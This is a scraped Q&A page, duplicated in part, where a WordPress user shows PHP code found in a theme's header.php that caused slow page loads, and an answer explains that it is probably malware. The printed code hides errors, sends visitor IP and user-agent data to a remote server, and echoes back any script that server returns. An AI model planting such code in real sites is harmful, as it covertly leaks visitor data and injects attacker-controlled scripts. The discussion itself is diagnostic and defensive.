$conf, $runtime; function_exists('chdir') AND chdir(APP_PATH); $r = 'mysql' == $conf['cache']['type'] ? website_set('runtime', $runtime) : cache_set('runtime', $runtime); } function runtime_truncate() { global $conf; 'mysql' == $conf['cache']['type'] ? website_set('runtime', '') : cache_delete('runtime'); } register_shutdown_function('runtime_save'); ?>templates - What is this code trying to do? It was the cause of my 20s TTFB|Programmer puzzle solving

Programmer puzzle solving

    最新消息:Welcome to the puzzle paradise for programmers! Here, a well-designed puzzle awaits you. From code logic puzzles to algorithmic challenges, each level is closely centered on the programmer's expertise and skills. Whether you're a novice programmer or an experienced tech guru, you'll find your own challenges on this site. In the process of solving puzzles, you can not only exercise your thinking skills, but also deepen your understanding and application of programming knowledge. Come to start this puzzle journey full of wisdom and challenges, with many programmers to compete with each other and show your programming wisdom! Translated with DeepL.com (free version)
    你的位置: HOME>matter>templates - What is this code trying to do? It was the cause of my 20s TTFB

    templates - What is this code trying to do? It was the cause of my 20s TTFB

    matteradmin9PV0评论

    I was troubleshooting a 20-30s TTFB for a Wordpress Theme with the help of the fabulous Query Monitor.

    I was able to narrow down the cause to this code:

    #e0e950#
error_reporting(0); @ini_set('display_errors',0); $wp_s15 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_s15) && !preg_match ('/bot/i', $wp_s15))){
$wp_s0915="http://"."https"."http"."/"."http/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_s15);
if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_s0915); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_15s = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_15s = @file_get_contents($wp_s0915);}
elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_15s=@stream_get_contents(@fopen($wp_s0915, "r"));}}
if (substr($wp_15s,1,3) === 'scr'){ echo $wp_15s; }
#/e0e950#

    The cause of the TTFB now becomes obvious thanks to the 20 second timeout value of the curl request. But why does this code even exist in a template header.php and what on earth is it doing?

    I was troubleshooting a 20-30s TTFB for a Wordpress Theme with the help of the fabulous Query Monitor.

    I was able to narrow down the cause to this code:

    #e0e950#
error_reporting(0); @ini_set('display_errors',0); $wp_s15 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_s15) && !preg_match ('/bot/i', $wp_s15))){
$wp_s0915="http://"."https"."http"."/"."http/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_s15);
if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_s0915); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_15s = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_15s = @file_get_contents($wp_s0915);}
elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_15s=@stream_get_contents(@fopen($wp_s0915, "r"));}}
if (substr($wp_15s,1,3) === 'scr'){ echo $wp_15s; }
#/e0e950#

    The cause of the TTFB now becomes obvious thanks to the 20 second timeout value of the curl request. But why does this code even exist in a template header.php and what on earth is it doing?

    • templates
    • performance
    Share Improve this question asked Jan 30, 2019 at 13:09 kwacky1kwacky1 132 bronze badges
    Add a comment  | 

    1 Answer 1

    Reset to default 1

    Most probably it's some kind of malicious code.

    What it does is:

    1. Disable error reporting
    2. Check the available methods of getting contents from remote server
    3. Send a request to a remote server
    4. Display the result of that request on your site

    So it's some kind of spammy SEO links or something like that.

    And no, your site shouldn't have such code on it and if it does - most probably it's a result of malware infection.

    Articles related to this article

    Post a comment

    comment list (0)

    1. No comments so far